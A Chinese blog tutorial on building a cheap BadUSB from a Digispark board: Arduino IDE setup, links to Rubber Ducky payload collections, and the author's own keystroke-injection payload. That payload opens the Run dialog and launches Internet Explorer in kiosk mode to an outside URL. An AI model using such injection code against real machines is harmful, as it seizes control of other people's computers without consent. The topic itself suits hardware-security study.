摘要:
BadUSB最早是在2014年的黑帽大会上研究人员JakobLell和Karsten Nohl提出并展示的。不同于老式的U盘病毒,它利用了USB协议中的一个漏洞,通过模拟键盘、鼠标、网卡等从而让目标电脑执行恶意代码,达到控住主机或者窃取敏感信息等目的。

等了2个月期待已久的橡皮鸭终于到货了,在hack5上面买的https://hakshop.com ;



国内也有RadioWar基于Teensy++ 2.0 AT90USB1286芯片设计的FireGoose(烧鹅)http://wiki.radiowar.org/烧鹅

国内的部分极客也都在自己制作Badusb,大多是采用的Teensy 或者Arduino Leonardo,淘宝上还有厂商制作的U盘模样的Arduino Leonardo。

Digispark官网给出的有教程。http://digistump.com/wiki/digispark/tutorials/connecting
安装 arduino 的 IDE。https://www.arduino.cc/en/Main/Software直接从官网按照自己的操作系统下载并安装。
安装Digispark的驱动。(32位操作系统和64位操作系统安装程序不同,需注意)https://github.com/digistump/Dig … gistump.Drivers.zip
在Arduino应用程序中,进入“文件”菜单并选择“首选项”

在附加开发板管理器网址内填入并点击确定
http://digistump.com/package_digistump_index.json
注意:如果您已经在该框中输入了更多网址,请点击框右侧的按钮,然后在新行中输入此网址。

进入“工具”菜单,然后选择“开发板”子菜单 - 选择“开发板管理器”

然后从类型下拉菜单中选择“贡献”, 选择“Digistump AVR Boards”包,然后单击“安装”按钮
您将在“开发板管理器”窗口的底部栏上看到下载进度,完成后它会在列表中的该项旁边显示“已安装”。(特别慢)
安装完成后,就可以在开发板中看到Digispark了。选择默认的Digispark (Default - 16.5mhz)。
注意:在调用上传之前,不需要插入Digispark
点击上传按钮。底部状态框现在会要求您插入Digispark - 此时您需要插入它 - 或者拔下并重新插入它。
❸ Payload
关于的Digispark的payload,可以参考甚至修改它的keyboard库文件(修改可以参考usb.org)。
https://github.com/BesoBerlin/DigiKeyboard_DE/blob/master/DigiKeyboard.h
说到BadUSB的payload,就不得不提到hak5的USB-Rubber-Ducky。
https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads
应该是目前BadUSB里面payload最全的了,如果你懒得写,可以直接使用USB-Rubber-Ducky的payload翻译脚本
https://github.com/toxydose/Duckyspark
直接将大黄鸭的payload翻译成Digispark可用的就行了。
当然,我还是建议自己来改DigiKeyboard.h 文件和payload。
这里给出我的payload抛砖引玉
恶搞payload

#include "DigiKeyboard.h"
void setup() {DigiKeyboard.delay(2000);//开机延迟两秒钟,用于系统识别Digispark
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);//按R和win键,打开运行
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyPress(KEY_LEFT_SHIFT);//按住左SHIFT,绕过输入法
DigiKeyboard.println("IEXPLORE   -K   HTTP://MTFLY.NET/X.HTM");
DigiKeyboard.sendKeyPress(0);//松开
DigiKeyboard.sendKeyStroke(KEY_ENTER);//按回车
DigiKeyboard.delay(2000);
DigiKeyboard.sendKeyStroke(KEY_A);//按A键,绕过第一次打开ie的提示框
}
void loop() {}

注意:使用该payload时需要修改本地的DigiKeyboard.h,添加左shift键
#define KEY_LEFT_SHIFT 0xE1

总结
这么一个这么廉价并且win10无驱运行的BadUSB,Digispark可以算是居家旅行,杀人灭口的必备良器了。

BADUSB 橡皮鸭 键盘注入漏洞 USB协议漏洞相关推荐

  1. BadUSB橡皮鸭WinLinux通用下载者

    TB上买橡皮鸭USB开发板,也叫BadUSB,二三十块钱一个,可以通过简单编程将逻辑刷入USB固件中,插入电脑的时候,模拟键盘按键,自动执行特定逻辑. 下面是我写的一个兼容Windows和Linux的 ...

  2. 微软多个 Windows 系统存在远程代码执行漏洞(ICMP协议)(MPS-2023-1376)

    漏洞描述 Internet Control Message Protocol (ICMP) 协议是TCP/IP协议簇的一个子协议,用于在IP主机.路由器之间传递控制消息.raw socket 是一种网 ...

  3. [CNVD-2020-10487/CVE-2020-1938]: Tomcat AJP协议漏洞

    环境搭建 下载存在漏洞版本8.5.50: https://archive.apache.org/dist/tomcat/tomcat-8/v8.5.50/bin/apache-tomcat-8.5.5 ...

  4. 利用USB RUBBER DUCKY(USB 橡皮鸭)在目标机器上启动Empire或Meterpreter会话

    今天我将教大家如何使用Rubber Ducky在渗透中建立Empire或Meterpreter会话连接.然而对于Ducky而言,想要完成大多数现实场景中的USB攻击,往往需要花费大量的时间去实践.本文 ...

  5. USB 协议分析之 HID 设备

    1. 简述 USB HID类是USB设备的一个标准设备类,包括的设备非常多.HID类设备定义它属于人机交互操作的设备,用于控制计算机操作的一些方面,如USB鼠标.USB键盘.USB游戏操纵杆等.但HI ...

  6. [RCTF2019]printer详解(python脚本、USB协议精解、TSLP2文档阅读)

    一个非常好的网站,可以学习USB协议: USB中文网 拿到文件发现是USB数据,第一反应用脚本提取: aaaaaaaaccccaahdgeeefefdgeegegeegcccbaabfefghifee ...

  7. USB协议详解第3讲(USB描述符-设备描述符)

    我们第一个学习要点就是USB描述符,所谓描述符其实就是C语言里面的结构体或者数组,数组包含的信息说明当前的设备具有哪些特征.USB描述符有设备描述符.配置描述符.接口描述符.端点描述符.字符串描述符, ...

  8. 程序员必备技能:橡皮鸭程序调试法

    道阻且长,行则将至.埋头苦干,不鸣则已,一鸣惊人!加油,骚年! 前言   本文转载自:   陈皓:橡皮鸭子调试法   coolshell:橡皮鸭程序调试法 正文开始   下面,让我来为你介绍一个程序调 ...

  9. 橡皮鸭程序调试法[转] 相当有趣^_^

    橡皮鸭程序调试法 http://coolshell.cn/?p=1719 2009年11月10日 1,218 次点击 阅读评论 发表评论 下面,让我来为你介绍一个程序调试大法--"橡皮鸭程序 ...

最新文章

  1. 楼主考南师计算机学硕,南京师范大学考研详解:据说这所学校不太好考?嗯,是真的!...
  2. 滴滴联合比亚迪:首款定制网约车D1发布
  3. java模糊查询比对方法_Java多条件和模糊查询
  4. 【招聘(上海)】美团酒店招聘 .NET 高级开发
  5. java 比特币私钥生成_如何生成自己的比特币私钥
  6. 2.MySQL中的索引
  7. Java进阶资源汇总
  8. 几点减几点怎么列算式_节日礼品怎么挑选 这几点很关键
  9. 属性子集选择的基本启发方法_Java机器学习库(Java ML)(三、特征选择)
  10. 敏捷个人新体系学习 - 1.实践的艺术
  11. linux定时任务的设置 crontab 配置指南
  12. socksCap32+socks2http软件
  13. 多台欧姆龙PLC通过智能网关实现HTTP协议对接MES系统
  14. 使用百度 AI 进行智能写诗 智能春联
  15. 静态网站生成器(开源项目)
  16. python求主析取范式_肤浅的聊聊 TiDB 扫表算子, 扫索引算子, 合取范式(CNF), 析取范式(DNF), skyline pruning...
  17. Kademlia详解 (转贴NeoRagex2002)
  18. ArrayList集合
  19. UTONMOS:元宇宙链游之风、燎原之势
  20. ipad协议最新替代

热门文章

  1. Mysql 解决 sum求和有多位小数
  2. 电商总结-日志监控系统的解决方案
  3. QK Read, développer des habitudes de lecture
  4. 麦芒7能升级鸿蒙,华为鸿蒙系统升级名单
  5. Python 使用xlrd 读取 Excel 报错:xlrd.compdoc.CompDocError: Workbook corruption: seen[3] == 4
  6. org.apache.ibatis.builder.IncompleteElementException: Could not find parameter map java.util.Map
  7. python scipy.signal.pwelch_Welch’s power spectral density estimate
  8. 题库(3)_计算圆周率Π
  9. b和B的区别?以及b、B、KB、MB、TB、PB、EB的换算
  10. 新氧运营三箭齐发,带领医美行业穿越发展迷雾